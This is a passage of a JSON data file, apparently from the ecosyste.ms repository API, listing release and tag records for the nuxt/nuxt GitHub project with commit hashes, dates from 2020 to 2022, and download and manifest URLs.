rl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"n